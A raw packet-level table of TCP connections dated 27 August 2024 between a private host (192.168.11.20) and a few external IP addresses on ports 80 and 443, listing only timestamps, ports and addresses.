Aug 27, 2024 18:04:51.280116081 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280160904 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280208111 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280230045 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280256987 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280293941 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280349970 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280404091 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280405045 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280453920 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280457973 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280508995 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280514002 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280558109 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280572891 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280608892 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280662060 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280668020 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280757904 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280781984 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280831099 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280843973 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.280925035 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.280941963 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281002998 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281024933 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281096935 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281146049 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281193972 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281194925 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281258106 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281263113 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281312943 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281341076 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281393051 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281397104 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281467915 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281497002 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281543016 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281588078 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281624079 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281636953 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281687021 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281721115 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281779051 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281862020 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.281862020 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281944990 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.281951904 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282031059 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282041073 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282094955 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282136917 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282198906 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282217026 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282289982 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282290936 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282371044 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282393932 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282432079 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282445908 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282516956 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282536983 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282586098 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282588005 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282668114 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282692909 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282723904 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282742023 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282778978 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282812119 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282833099 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282876015 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282888889 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282927036 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282944918 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.282975912 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.282999992 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.283044100 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.283056021 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.283112049 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.283148050 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.283165932 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.283200026 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.283222914 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.283252001 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.283317089 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.283395052 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.283694029 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.283775091 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.283849955 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.283930063 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.284356117 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.284514904 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.284557104 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.284707069 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.284748077 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.284864902 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.284872055 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.284938097 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.285028934 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.285087109 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.439352036 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.439429998 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.439650059 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.439727068 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.439764023 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.439841986 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.440025091 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.440319061 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440412998 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440529108 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440553904 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.440602064 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440660954 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440692902 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.440716982 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440741062 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.440772057 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440828085 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.440862894 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.440862894 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.440862894 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.441030979 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.441030979 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.442378998 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.442485094 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.442588091 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.442651987 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.442673922 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.442722082 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.442743063 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.442779064 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.442831039 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.442900896 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.442898989 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.442899942 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.442996979 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443063974 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443063974 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443079948 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443150043 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443226099 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443245888 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443275928 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443331957 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443380117 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443402052 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443429947 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443500042 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443558931 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443558931 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443591118 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443674088 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443700075 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443756104 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443761110 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443845987 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443851948 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443929911 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.443978071 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.443994045 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444045067 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444077015 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444093943 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444144964 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444147110 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444242001 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444271088 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444355011 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444363117 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444441080 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444442034 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444513083 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444598913 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444603920 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444649935 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444673061 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444729090 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444782972 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444806099 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444806099 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444838047 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444864035 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444891930 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444921970 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.444946051 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.444972992 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445000887 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445025921 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445055962 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445111036 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445146084 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445195913 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445247889 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445296049 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445436954 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445516109 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445595980 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445651054 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445703030 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445755005 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445825100 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.445835114 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.445904016 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446012974 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446048975 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446089029 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446173906 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446208954 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446259975 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446259975 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446345091 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446432114 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446434975 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446434975 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446494102 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446495056 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446573019 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446626902 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446626902 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446659088 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446724892 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446768045 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:51.446782112 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446821928 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:51.446892023 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:52.264115095 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:52.451055050 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:52.451251030 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:52.451443911 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:52.638076067 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:52.640187025 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:52.659390926 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:52.847749949 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:52.901048899 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:53.495137930 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:53.495244980 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:53.495513916 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:53.528937101 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:53.529002905 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:53.778285980 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:53.778527975 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:53.783749104 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:53.783771992 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:53.784364939 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:53.813827991 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:53.856180906 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:54.328418970 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:54.328660965 CEST	443	49797	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:54.328825951 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:54.331367016 CEST	49797	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:54.339828968 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:54.528420925 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:54.530405998 CEST	49798	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:54.530503988 CEST	443	49798	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:54.530730009 CEST	49798	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:54.530915976 CEST	49798	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:54.530976057 CEST	443	49798	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:54.572635889 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:54.744244099 CEST	443	49798	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:54.745934010 CEST	49798	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:54.745971918 CEST	443	49798	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.009747982 CEST	443	49798	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.010250092 CEST	443	49798	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.010499001 CEST	49798	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.010761976 CEST	49798	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.012911081 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:55.200591087 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:55.201119900 CEST	49799	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.201153994 CEST	443	49799	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.201327085 CEST	49799	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.201503038 CEST	49799	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.201522112 CEST	443	49799	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.244292021 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:55.415695906 CEST	443	49799	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.417315006 CEST	49799	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.417332888 CEST	443	49799	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.672487020 CEST	443	49799	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.672964096 CEST	443	49799	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.673187971 CEST	49799	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.673387051 CEST	49799	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.675640106 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:55.864722967 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:55.865617037 CEST	49800	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.865715981 CEST	443	49800	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.866081953 CEST	49800	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.866265059 CEST	49800	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:55.866318941 CEST	443	49800	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:55.916109085 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:56.083725929 CEST	443	49800	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:56.084997892 CEST	49800	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:56.085016966 CEST	443	49800	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:56.282955885 CEST	80	49795	104.153.208.178	192.168.11.20
Aug 27, 2024 18:04:56.283227921 CEST	49795	80	192.168.11.20	104.153.208.178
Aug 27, 2024 18:04:56.340212107 CEST	443	49800	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:56.340742111 CEST	443	49800	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:56.340997934 CEST	49800	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:56.341240883 CEST	49800	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:56.343410015 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:56.531816006 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:56.532481909 CEST	49801	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:56.532578945 CEST	443	49801	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:56.532783031 CEST	49801	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:56.532922029 CEST	49801	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:56.532975912 CEST	443	49801	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:56.587785959 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:56.754595995 CEST	443	49801	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:56.755877972 CEST	49801	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:56.755944967 CEST	443	49801	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.035707951 CEST	443	49801	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.035850048 CEST	443	49801	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.036001921 CEST	49801	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.036207914 CEST	49801	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.038362026 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:57.226730108 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:57.227309942 CEST	49802	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.227353096 CEST	443	49802	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.227607965 CEST	49802	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.227801085 CEST	49802	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.227829933 CEST	443	49802	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.275178909 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:57.444981098 CEST	443	49802	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.446360111 CEST	49802	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.446432114 CEST	443	49802	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.711227894 CEST	443	49802	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.711782932 CEST	443	49802	104.21.67.152	192.168.11.20
Aug 27, 2024 18:04:57.711987972 CEST	49802	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.712281942 CEST	49802	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.714824915 CEST	49796	80	192.168.11.20	193.122.6.168
Aug 27, 2024 18:04:57.902642012 CEST	80	49796	193.122.6.168	192.168.11.20
Aug 27, 2024 18:04:57.903263092 CEST	49803	443	192.168.11.20	104.21.67.152
Aug 27, 2024 18:04:57.903358936 CEST	443	49803	104.21.67.152	192.168.11.20
